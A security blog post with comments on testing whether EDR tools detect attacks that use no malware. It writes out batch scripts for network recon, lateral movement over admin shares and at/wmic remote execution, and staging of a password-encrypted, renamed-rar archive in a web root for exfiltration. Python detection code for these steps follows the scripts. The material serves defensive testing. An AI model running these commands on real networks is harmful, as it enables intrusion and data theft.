Friday, January 12, 2018

What are your tools detecting

At some point during an intrusion, once the attacker has gained enough access, the need for malware goes away.  External access to the target network can be achieved through a VPN, a third-party connection or a simple misconfiguration on an external-facing device.  Lateral movement, data consolidation and staging can all happen using built-in Windows tools.  Data packaging can happen with built-in tools or with public archiving utilities that are most likely already used, legitimately, by multiple users throughout your network.  If an attacker has achieved this level of access, this is the point at which you really need to ask yourself whether the tools you have in place are capable of alerting you to what is happening.

From an EDR perspective, how much do you feel the vendor should be detecting and alerting on?  What types of data do you feel an EDR solution should be collecting?  How important are the interface and the query language?  All of this matters even more if you don’t have the capability to author your own signatures, or if the interface is so poorly designed, or so limited by the vendor, that generating your own alerts is not feasible.

I put together some tests that you can use to verify the capabilities of your tools when it comes to recon, lateral movement and data staging.  I would be very curious to know what your outcomes are and whether there are obvious gaps in coverage across vendors.  I think it would be pretty enlightening for the entire community.

This is also not meant to put down the work vendors are doing in this area.  It has come a long way, but I think we often get focused on finding “the malware” when that is only one aspect of an intrusion.

Note: Change the below scripts and commands to match your environment.

========== a.bat ===========
@echo off
ping -n 1 192.168.1.3>>c:\temp\a.txt
ping -n 1 192.168.1.4>>c:\temp\a.txt
ping -n 1 192.168.1.5>>c:\temp\a.txt
ping -n 1 192.168.1.6>>c:\temp\a.txt
ping -n 1 192.168.1.7>>c:\temp\a.txt
ping -n 1 192.168.1.8>>c:\temp\a.txt
ping -n 1 192.168.1.9>>c:\temp\a.txt
ping -n 1 192.168.1.10>>c:\temp\a.txt
ping -n 1 192.168.1.11>>c:\temp\a.txt
ping -n 1 192.168.1.12>>c:\temp\a.txt
ping -n 1 192.168.1.13>>c:\temp\a.txt
ping -n 1 192.168.1.14>>c:\temp\a.txt
ping -n 1 192.168.1.15>>c:\temp\a.txt
ping -n 1 192.168.1.16>>c:\temp\a.txt
ping -n 1 192.168.1.17>>c:\temp\a.txt
ping -n 1 192.168.1.18>>c:\temp\a.txt
ping -n 1 192.168.1.19>>c:\temp\a.txt
ping -n 1 192.168.1.20>>c:\temp\a.txt
ping -n 1 192.168.1.21>>c:\temp\a.txt
ping -n 1 192.168.1.22>>c:\temp\a.txt
ping -n 1 192.168.1.23>>c:\temp\a.txt
ping -n 1 192.168.1.24>>c:\temp\a.txt
ping -n 1 192.168.1.25>>c:\temp\a.txt
ping -n 1 192.168.1.26>>c:\temp\a.txt
ping -n 1 192.168.1.27>>c:\temp\a.txt
ping -n 1 192.168.1.28>>c:\temp\a.txt
 
=========== Execute a.bat ========
cmd /c a.bat
 
========== b.bat ===========
@echo off
net localgroup administrators >>c:\windows\system32\b.txt
quser >>c:\windows\system32\b.txt
netstat -nab -p tcp >>c:\windows\system32\b.txt
net start >>c:\windows\system32\b.txt
net session >>c:\windows\system32\b.txt
net share >>c:\windows\system32\b.txt
net use >>c:\windows\system32\b.txt
net view >>c:\windows\system32\b.txt
net view /domain >>c:\windows\system32\b.txt
net time /domain >>c:\windows\system32\b.txt
ipconfig /all >>c:\windows\system32\b.txt
route print >>c:\windows\system32\b.txt
systeminfo >>c:\windows\system32\b.txt
dsquery server >>c:\windows\system32\b.txt
dsquery subnet -limit 10000 >>c:\windows\system32\b.txt
net group "domain admins" /domain >>c:\windows\system32\b.txt
net group "enterprise admins" /domain >>c:\windows\system32\b.txt
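
One way to check whether your process telemetry actually exposes a.bat and b.bat, as an added example in Python that is not part of the original post: it builds constructed Sysmon-style process-creation records (host, parent pid, parent image, image and command line are assumed field names) for the ping sweep, the recon batch and some benign admin activity, then runs two detectors over them: one parent pinging many distinct addresses in a short window, and one parent launching many different discovery binaries in a short window. Thresholds and window sizes are assumptions to tune against your own baseline.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Binaries b.bat chains together; an interactive user rarely runs this many in one sitting.
DISCOVERY = {"net.exe", "net1.exe", "quser.exe", "netstat.exe", "ipconfig.exe", "route.exe",
             "systeminfo.exe", "dsquery.exe", "nbtstat.exe", "tasklist.exe", "whoami.exe", "nltest.exe"}
IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
CMD = r"C:\Windows\System32\cmd.exe"
S32 = "C:\\Windows\\System32\\"

def _ev(host, time, ppid, parent, image, cmdline):
    """One process-creation record (field names are an assumption, modelled on Sysmon event 1)."""
    return {"host": host, "time": time, "ppid": ppid, "parent_image": parent,
            "image": image, "cmdline": cmdline}

# Constructed telemetry. a.bat on WS01: one ping per second at 26 consecutive addresses,
# every one a child of the same cmd.exe (pid 4120).
T0 = datetime(2018, 1, 12, 14, 0, 0)
EVENTS = [_ev("WS01", T0 + timedelta(seconds=i), 4120, CMD, S32 + "PING.EXE",
              f"ping -n 1 192.168.1.{3 + i}") for i in range(26)]
# b.bat on SRV02, launched by the at job (cmd.exe pid 2288): the recon commands, two seconds apart.
B_BAT = ["net localgroup administrators", "quser", "netstat -nab -p tcp", "net start",
         "net session", "net share", "net use", "net view", "net view /domain",
         "ipconfig /all", "route print", "systeminfo", "dsquery server",
         'net group "domain admins" /domain']
T1 = datetime(2018, 1, 12, 14, 31, 0)
EVENTS += [_ev("SRV02", T1 + timedelta(seconds=2 * i), 2288, CMD,
               S32 + c.split()[0].upper() + ".EXE", c) for i, c in enumerate(B_BAT)]
# Benign admin activity on WS07: one ping and two discovery commands an hour apart.
EVENTS += [
    _ev("WS07", T0 + timedelta(minutes=5), 9001, CMD, S32 + "PING.EXE", "ping -n 1 192.168.1.1"),
    _ev("WS07", T0 + timedelta(minutes=6), 9001, CMD, S32 + "ipconfig.exe", "ipconfig /all"),
    _ev("WS07", T0 + timedelta(minutes=66), 9001, CMD, S32 + "net.exe", "net use"),
]

def _base(path):
    return path.rsplit("\\", 1)[-1].lower()

def _by_parent(events, keep):
    """Events passing `keep`, grouped by (host, parent pid) and sorted by time."""
    groups = defaultdict(list)
    for e in events:
        if keep(e):
            groups[(e["host"], e["ppid"])].append(e)
    for evs in groups.values():
        evs.sort(key=lambda e: e["time"])
    return groups

def _windows(evs, window):
    """Each event paired with itself and the events that follow it within `window`."""
    for i, start in enumerate(evs):
        yield start, [e for e in evs[i:] if e["time"] - start["time"] <= window]

def find_ping_sweeps(events, min_targets=10, window=timedelta(minutes=2)):
    """One parent pinging at least min_targets distinct addresses inside `window`."""
    hits = []
    for (host, ppid), evs in _by_parent(events, lambda e: _base(e["image"]) == "ping.exe").items():
        for start, w in _windows(evs, window):
            targets = set()
            for e in w:
                m = IP_RE.search(e["cmdline"])
                if m:
                    targets.add(m.group(1))
            if len(targets) >= min_targets:
                hits.append({"host": host, "ppid": ppid, "parent": _base(start["parent_image"]),
                             "targets": len(targets), "first": start["time"]})
                break  # one alert per parent is enough
    return hits

def find_discovery_bursts(events, min_distinct=5, window=timedelta(minutes=5)):
    """One parent running at least min_distinct different discovery binaries inside `window`."""
    hits = []
    for (host, ppid), evs in _by_parent(events, lambda e: _base(e["image"]) in DISCOVERY).items():
        for start, w in _windows(evs, window):
            seen = sorted({_base(e["image"]) for e in w})
            if len(seen) >= min_distinct:
                hits.append({"host": host, "ppid": ppid, "parent": _base(start["parent_image"]),
                             "commands": seen, "first": start["time"]})
                break
    return hits

if __name__ == "__main__":
    for hit in find_ping_sweeps(EVENTS) + find_discovery_bursts(EVENTS):
        print(hit)
```

Two caveats when you port this to real data: key on the parent's process GUID rather than its pid, since pids are recycled, and remember that several net subcommands hand off to net1.exe, whose parent is net.exe rather than the batch's cmd.exe, so group by the whole process tree if you want those counted. If your EDR cannot give you parent, image and command line for every process start, neither detector can be built on its data, which is exactly the kind of gap these tests are meant to surface.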
 
======= Mount share and copy batch script ========
nbtstat -a x.x.x.x >>c:\temp\a.txt
net use \\x.x.x.x password /user:domain\user
net use Z: \\x.x.x.x\c$ password /user:domain\user
copy C:\temp\*.bat Z:\windows\system32\
dir Z:\windows\system32\*.bat
 
====== Schedule at job, execute script, copy results back, delete share ========
net time \\x.x.x.x
at \\x.x.x.x
at \\x.x.x.x 4:01 "C:\windows\system32\b.bat"
net time /domain
tasklist
dir Z:\windows\system32\b.txt
copy Z:\windows\system32\b.txt C:\temp\b.txt
at \\x.x.x.x 1 /delete /y
Note: the 1 is the job id that at.exe printed when the job was added. at.exe is deprecated from Windows 8 / Server 2012 onward in favour of schtasks.exe, so against newer targets this step becomes schtasks /s x.x.x.x and is worth testing separately.
net use Z: /delete /y
 
========== abc.bat ===========
@echo off
c:\temp\cmd.exe a -hppassword c:\temp\abc.temp c:\data\for\exfil -x*.exe -x*.dll
Note: cmd.exe is a renamed copy of rar.exe. In rar syntax, a adds to the archive, -hp<password> encrypts both the file data and the file list (headers) with the given password, and -x<mask> excludes matching files; the archive gets a non-rar extension (.temp) for the same reason the binary was renamed.
=========== Create and move exfil =============
copy c:\temp\abc.bat \\x.x.x.x\c$\temp\abc.bat
copy c:\temp\cmd.exe \\x.x.x.x\c$\temp\cmd.exe
wmic /node:"x.x.x.x" /user:"domain\username" /password:"password" process call create "cmd.exe /c c:\temp\abc.bat"
copy \\x.x.x.x\c$\temp\abc.temp c:\temp\abc.temp
copy c:\temp\abc.temp \\x.x.x.x\c$\inetpub\wwwroot\website\abc.temp
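
The lateral movement and staging steps above, as an added example in Python that is not part of the original post: constructed Sysmon-style records (process creates carrying OriginalFileName, file creates carrying the writing image; the field names, the hostnames WS01/SRV02/WS07 and the address 10.0.0.20 are all assumptions) for the at job, the wmic remote execution, the renamed rar run, the archive write and the copy into wwwroot, next to a benign rar run and a benign page deployment. classify() tags single records, and find_staging_chains() ties archiver, archive and web-root drop together per host.

```python
import re
from collections import defaultdict
from datetime import datetime

# PE OriginalFileName values (lower-cased) of common archivers; renaming the file on disk does
# not change this field, which is what exposes c:\temp\cmd.exe.
ARCHIVERS = {"rar.exe", "winrar.exe", "7z.exe", "7za.exe", "7zg.exe"}
# What a web root legitimately holds; anything else written under it is staging until proven otherwise.
WEB_CONTENT = {".html", ".htm", ".css", ".js", ".png", ".jpg", ".gif", ".ico", ".asp", ".aspx"}
CMD = r"C:\Windows\System32\cmd.exe"

def _base(path):
    return path.rsplit("\\", 1)[-1].lower()

def _proc(host, ts, parent, image, original_name, cmdline):
    """Process-creation record (field names assumed, modelled on Sysmon event 1 with OriginalFileName)."""
    return {"type": "process", "host": host, "time": datetime.fromisoformat(ts), "parent_image": parent,
            "image": image, "original_name": original_name, "cmdline": cmdline}

def _file(host, ts, image, path):
    """File-creation record (modelled on Sysmon event 11): which image wrote which path."""
    return {"type": "file", "host": host, "time": datetime.fromisoformat(ts), "image": image, "path": path}

# Constructed telemetry for the chain above. WS01 is the foothold, SRV02 (10.0.0.20) the target.
EVENTS = [
    _proc("WS01", "2018-01-12T15:02:10", CMD, r"C:\Windows\System32\at.exe", "at.exe",
          r'at \\10.0.0.20 4:01 "C:\windows\system32\b.bat"'),
    _proc("WS01", "2018-01-12T15:10:00", CMD, r"C:\Windows\System32\wbem\WMIC.exe", "wmic.exe",
          r'wmic /node:"10.0.0.20" /user:"corp\jsmith" /password:"Winter2018" '
          r'process call create "cmd.exe /c c:\temp\abc.bat"'),
    # On the target, commands started through WMI are children of WmiPrvSE.exe.
    _proc("SRV02", "2018-01-12T15:10:01", r"C:\Windows\System32\wbem\WmiPrvSE.exe", CMD, "Cmd.Exe",
          r"cmd.exe /c c:\temp\abc.bat"),
    _proc("SRV02", "2018-01-12T15:10:01", CMD, r"C:\temp\cmd.exe", "Rar.exe",
          r"c:\temp\cmd.exe a -hpWinter2018 c:\temp\abc.temp c:\data\for\exfil -x*.exe -x*.dll"),
    _file("SRV02", "2018-01-12T15:10:02", r"C:\temp\cmd.exe", r"C:\temp\abc.temp"),
    # The copy into wwwroot arrives over SMB (c$), so the target attributes the write to System (assumption).
    _file("SRV02", "2018-01-12T15:14:30", "System", r"C:\inetpub\wwwroot\website\abc.temp"),
    # Benign: an admin archives a folder with the real rar.exe, and a deployment updates a page.
    _proc("WS07", "2018-01-12T09:30:00", r"C:\Windows\explorer.exe", r"C:\Program Files\WinRAR\Rar.exe",
          "Rar.exe", r'"C:\Program Files\WinRAR\Rar.exe" a D:\backup\docs.rar D:\docs'),
    _file("SRV02", "2018-01-12T11:00:00", "System", r"C:\inetpub\wwwroot\website\index.html"),
]

def classify(e):
    """Behaviour tags a single record matches (empty set for benign records)."""
    tags = set()
    if e["type"] == "process":
        img, cmd, ofn = _base(e["image"]), e["cmdline"], e["original_name"].lower()
        if img == "wmic.exe" and re.search(r"/node:", cmd, re.I) and re.search(r"process\s+call\s+create", cmd, re.I):
            tags.add("remote_wmi_exec")          # wmic aimed at another host
        if img == "at.exe" and re.search(r"\\\\\S+", cmd):
            tags.add("remote_at")                # at.exe given a \\host
        if _base(e["parent_image"]) == "wmiprvse.exe":
            tags.add("wmi_child")                # something landed here via WMI
        if ofn in ARCHIVERS:
            if img != ofn:
                tags.add("renamed_archiver")     # on-disk name disagrees with OriginalFileName
            if re.search(r"(^|\s)-hp\S*|(^|\s)-p\S+", cmd):
                tags.add("password_archive")     # rar -hp / -p: encrypted archive
    else:
        name = _base(e["path"])
        ext = name[name.rfind("."):] if "." in name else ""
        if "\\inetpub\\wwwroot\\" in e["path"].lower() and ext not in WEB_CONTENT:
            tags.add("webroot_staging")          # non-web file dropped where HTTP can fetch it
    return tags

def summarize(events):
    """host -> sorted tags seen there; hosts with nothing flagged are omitted."""
    out = defaultdict(set)
    for e in events:
        out[e["host"]] |= classify(e)
    return {h: sorted(t) for h, t in out.items() if t}

def find_staging_chains(events, window_s=7200):
    """Per host: suspicious archiver run -> archive written by it -> non-web file under wwwroot, within window_s."""
    chains = []
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda x: x["time"]):
        by_host[e["host"]].append(e)
    for host, evs in by_host.items():
        for a in evs:
            if a["type"] != "process" or not (classify(a) & {"renamed_archiver", "password_archive"}):
                continue
            later = [f for f in evs if f["type"] == "file"
                     and 0 <= (f["time"] - a["time"]).total_seconds() <= window_s]
            archive = next((f for f in later if f["image"].lower() == a["image"].lower()), None)
            staged = next((f for f in later if "webroot_staging" in classify(f)), None)
            if archive and staged:
                chains.append({"host": host, "archiver": a["image"], "archive": archive["path"],
                               "staged": staged["path"],
                               "elapsed_s": int((staged["time"] - a["time"]).total_seconds())})
    return chains

if __name__ == "__main__":
    print(summarize(EVENTS))
    for c in find_staging_chains(EVENTS):
        print(c)
```

The point of the benign records is that neither the real rar.exe nor a file written under wwwroot fires on its own; it is the renamed binary, the -hp switch and the non-web extension in the web root, in sequence on one host, that make the chain. Note also that the wmic command line carries the account password in clear text; any EDR that collects full command lines will have captured it, which is worth knowing both for the investigation and for how you handle that data afterwards.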

9 comments:

  1. "From an EDR perspective, how much do you feel the vendor should be detecting and alerting?"

    Good question, but is it one folks should really be asking if they're not already using an EDR solution?

    I think that the tests are great, and very much like what one would see IRL...most of it, I've seen myself.

    But let me share my experience...prior to my current employment, I worked for SWRX for four years. In that time, with all of the targeted threat hunting, targeted threat response, and straight up IR work that I did, not a single client that I worked with had an EDR solution in place before they called for assistance (and I was assigned to work with them). This is just my experience, looking back...I cannot speak for everyone else.

    When I've talked to others about EDR solutions, there've been the inevitable questions about how to detect stuff like what you've shown in your blog post. I'd ask questions, such as, "...to start, do your admins use net.exe to manage user accounts?", to which I've gotten a blank stare about 100% of the time...and no actual response.

    Things like this are very helpful. At the DoD Cyber Crime Conference in 2012 (in Atlanta), an attendee asked during a discussion of lateral movement, "...what does that look like?" This is why I started my "what it looks like" blog series.

    Tests like these are great ways for folks to test EDR solutions, as well. Great job, keep it coming!

  2. Another thought...

    The only real way to get any sort of 'side-by-side' comparison, and to go beyond (or rather, make sense of...) the marketing materials, is to talk to someone who has hands-on experience using such tools IRL, on real-world engagements.

  3. Some of these things, you can look for in your environment without having/before you have an EDR solution in place...yes, I'm talking about a threat hunt. ;-)

    For the batch files, look for files with those extensions listed in AppCompatCache data. Look for unusual files listed in the AmCache.hve file, and make use of the fact that many will have SHA-1 hashes; if the path looks odd, push the hash up to VT, and see what you get. Then search on Google.

    Scheduled tasks being created/"registered" on systems appears as event ID 106 and 140 pairs in the TaskScheduler/Operational Event Log. Scheduled task deletion appears as event ID 141. I've seen tasks be deleted after a short-running .exe has run, such as a RAT installer, etc. This has the effect of removing file system and Registry artifacts of the task, but the event log artifacts remain (until they're overwritten).

    I've also seen a long-running task launched, but the sched task deleted right after the process started. This leaves some very unique and extremely high fidelity artifacts in the Windows Event Log.

    Keep in mind that in order to create a sched task, the user account needs to have admin privs; once created, the task can run at System-level.

    That exfil is a great example, as I've seen it quite often. The actual exfil appears in the web server logs as GET requests for those files. I've also seen where an adversary has disabled logging and deleted all of the available logs prior to the exfil...

    Replies
    1. Thanks for the comments, Harlan.

      "From an EDR perspective, how much do you feel the vendor should be detecting and alerting?"

      I don't think all EDRs are created equal and from what I've seen, there are some that knock it out of the park when it comes to detecting this type of behavior and others that appear to have blinders on. To be honest though, I don't know that I even care as much about the vendor's ability to detect. For me, what is more important is my ability to detect what I feel I need to be. Whether it's native detection that comes with the tool or using data produced by the tool to build my own detection. I also know that there are many factors that go into a team's ability to build their own detection so I'm also not discounting the importance of solid detection being built into the tool.

      Another aspect that may be important to people is the interface. Does it lend itself to complex queries across your environment or does it limit you to a single text string search? Are the alerts at the severity you would expect them to be? Is that configurable? Can you easily pivot within the tool to validate alerts coming in? Would the interface speed up or slow down an investigation?

      Also, is the data that is being collected exportable? If so, the interface may not be as important. If it's not exportable then interface could be a very big deal.

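
The third comment's point about the TaskScheduler/Operational log, as an added example in Python that is neither the commenter's nor the post author's: constructed records for event IDs 106, 140 and 141 (the IDs named in the comment) plus 200 (action started), which is an assumption added here, and a detector that flags a task deleted within an hour of its own registration. The at job in the post is assumed to register as a task named \At1; the account names and the benign tasks are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Microsoft-Windows-TaskScheduler/Operational records (field subset). 106 task
# registered, 140 registration updated and 141 registration deleted are the IDs from the comment;
# 200 action started is an assumption added here.
def _rec(ts, event_id, task, user="", action=""):
    return {"time": datetime.fromisoformat(ts), "event_id": event_id, "task": task,
            "user": user, "action": action}

RECORDS = [
    # The at job from the post: registered as \At1 (assumed name), run once, deleted two minutes later.
    _rec("2018-01-12T16:01:05", 106, r"\At1", user=r"CORP\jsmith"),
    _rec("2018-01-12T16:01:05", 140, r"\At1", user=r"CORP\jsmith"),
    _rec("2018-01-12T16:01:30", 200, r"\At1", action=r"C:\windows\system32\b.bat"),
    _rec("2018-01-12T16:03:10", 141, r"\At1", user=r"CORP\jsmith"),
    # Benign: a nightly backup task created a week ago and retired today.
    _rec("2018-01-05T10:00:00", 106, r"\Backup\Nightly", user=r"CORP\backupsvc"),
    _rec("2018-01-12T10:00:00", 141, r"\Backup\Nightly", user=r"CORP\backupsvc"),
    # Benign: a long-lived maintenance task that simply ran.
    _rec("2017-11-03T08:00:00", 106, r"\Microsoft\Windows\Defrag\ScheduledDefrag", user="SYSTEM"),
    _rec("2018-01-12T03:00:00", 200, r"\Microsoft\Windows\Defrag\ScheduledDefrag",
         action=r"%windir%\system32\defrag.exe"),
]

AT_JOB = re.compile(r"^\\At\d+$")  # at.exe names its jobs At1, At2, ... (assumption)

def short_lived_tasks(records, max_age=timedelta(hours=1)):
    """Tasks whose 141 (deleted) follows their own 106 (registered) within max_age."""
    by_task = defaultdict(list)
    for r in sorted(records, key=lambda r: r["time"]):
        by_task[r["task"]].append(r)
    hits = []
    for task, recs in by_task.items():
        registered, actions = None, []
        for r in recs:
            if r["event_id"] == 106:
                registered, actions = r, []        # a fresh registration starts a new lifetime
            elif r["event_id"] == 200 and registered:
                actions.append(r["action"])        # what the task actually launched
            elif r["event_id"] == 141 and registered:
                age = r["time"] - registered["time"]
                if age <= max_age:
                    hits.append({"task": task, "at_job": bool(AT_JOB.match(task)),
                                 "registered_by": registered["user"], "deleted_by": r["user"],
                                 "lifetime_s": int(age.total_seconds()), "actions": actions})
                registered, actions = None, []
    return hits

if __name__ == "__main__":
    for hit in short_lived_tasks(RECORDS):
        print(hit)
```

Because the task's own files and Registry keys are gone by the time anyone looks, the 106/141 pair in the event log is often the only record that the job existed, and the 200 record in between tells you what it ran; this is why the log matters even without an EDR, and why an EDR that forwards these events is more useful than one that does not.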
  4. "I don't think all EDR's are created equal..."

    No, they're not...and that's something folks really need to understand when they're looking to make a purchase. However, before they even get to that point, they need to understand their own infrastructure and define their needs *first*, and then apply the appropriate metrics of "what is a _good_ EDR solution?" They need to go beyond the marketing hype.

    "...what is more important is my ability to detect what I feel I need to be."

    As an incident responder who's used these tools, I've talked with clients, as well as folks interested in such things, and when I've asked, "...do your admins use 'net.exe' to manage user accounts?", I just get a blank stare back. This goes to your "my ability to detect what I feel I need to be." I worked with one client who took this to heart, wrote a filter for their EDR solution, and detected the adversary's return...this time around, the IR took less than an hour.

    The UI for tools is important...how much of a change to their own workflow, or frame of reference if they don't have a workflow, does a user need to make?

  6. I'm interested in this topic. thank you for the article.
